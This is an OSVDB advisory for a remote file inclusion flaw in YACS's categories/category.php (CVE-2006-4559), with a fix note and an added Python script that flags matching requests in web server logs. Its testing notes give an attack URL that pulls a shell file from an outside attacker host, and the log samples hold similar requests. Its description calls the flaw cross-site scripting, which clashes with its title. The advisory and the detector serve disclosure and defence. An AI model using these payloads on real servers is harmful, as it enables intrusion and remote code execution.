YACS categories/category.php context[path_to_root] Variable Remote File Inclusion

2006-08-29T13:25:42
ID OSVDB:31302
Type osvdb
Reporter matasanos()
Modified 2006-08-29T13:25:42

Description

Vulnerability Description

YACS contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate the 'context[path_to_root]' variable upon submission to the 'categories/category.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Upgrade to version 6.9 or higher, as it has been reported to fix this vulnerability. In addition, the vendor has released a patch for some older versions.

Manual Testing Notes

http://[target]/[patch]/yacs/categories/category.php?context[path_to_root]=http://url--ataca.org/shell.txt?
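
To find requests of the shape shown above in web server logs, the following added example (not part of the OSVDB entry or of YACS) flags access-log lines that request categories/category.php with a context[path_to_root] value beginning with a URL scheme. The combined log format, the sample lines and the host remote.example are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script and parameter named in this advisory.
SCRIPT = "categories/category.php"
PARAM = "context[path_to_root]"
# Value starting with a URL scheme, "//" or a UNC prefix points off-host.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)", re.I)
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def is_suspicious(log_line):
    """True if the line requests SCRIPT with a remote-looking PARAM value."""
    m = REQUEST.search(log_line)
    if not m:
        return False
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/" + SCRIPT):
        return False
    # parse_qsl percent-decodes names and values, so the encoded form
    # context%5Bpath_to_root%5D is matched as well.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name.lower() == PARAM and REMOTE.match(value):
            return True
    return False

# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE = [
    '192.0.2.10 - - [29/Aug/2006:13:20:01 +0000] "GET /yacs/categories/category.php?id=4 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [29/Aug/2006:13:21:17 +0000] "GET /yacs/categories/category.php?context[path_to_root]=http://remote.example/x.txt? HTTP/1.1" 200 312',
    '192.0.2.44 - - [29/Aug/2006:13:21:19 +0000] "GET /yacs/categories/category.php?context%5Bpath_to_root%5D=ftp%3A%2F%2Fremote.example%2Fx HTTP/1.1" 200 298',
    '192.0.2.77 - - [29/Aug/2006:13:25:00 +0000] "GET /yacs/categories/category.php?context[path_to_root]=../ HTTP/1.1" 200 5120',
]

def scan(lines):
    """Return the indexes of the lines that is_suspicious() flags."""
    return [i for i, line in enumerate(lines) if is_suspicious(line)]

if __name__ == "__main__":
    for i in scan(SAMPLE):
        print("suspicious:", SAMPLE[i])
```

The last sample line carries a relative value and is not flagged; only values that point off-host are matched.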

References:

Vendor Specific News/Changelog Entry: http://www.yetanothercommunitysystem.com/yacs/articles/view.php/1664
Secunia Advisory ID: 21680
Related OSVDB ID: 31304
Related OSVDB ID: 31307
Related OSVDB ID: 31309
Related OSVDB ID: 31303
Related OSVDB ID: 31305
Related OSVDB ID: 31308
Related OSVDB ID: 31310
Related OSVDB ID: 31301
Related OSVDB ID: 31306
Generic Exploit URL: http://milw0rm.com/exploits/2282
CVE-2006-4559